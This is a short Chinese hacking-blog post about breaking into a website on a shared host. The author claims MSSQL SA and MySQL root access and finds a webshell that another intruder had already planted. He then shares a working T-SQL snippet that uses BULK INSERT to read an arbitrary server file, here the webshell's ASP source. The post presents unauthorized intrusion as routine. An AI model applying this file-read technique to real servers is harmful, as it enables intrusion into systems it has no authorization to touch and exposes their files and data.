这两天一直入侵一个网站 各种提权

包括

mssql:SA

mysql:ROOT

主机是星外的  可以看到目标目录

数据库是ASP的 不能插马

无奈找了很多人都木有办法。。。

今天无聊中查看目录 发现有一个高人上传了一个WEBSHELL

在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下

    Use webshell.cc;--(这里是随便选的一个数据库)
  drop table cmd;
  create table cmd (a text);
  BULK INSERT cmd
  FROM 'd:/freehos/webshell.cc.asp'
  WITH (
  FIELDTERMINATOR = 'n',
  ROWTERMINATOR = 'nn'
  )
  select * from cmd
  这样就成功读出了d:/freehos/webshell.cc.asp

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/2043.html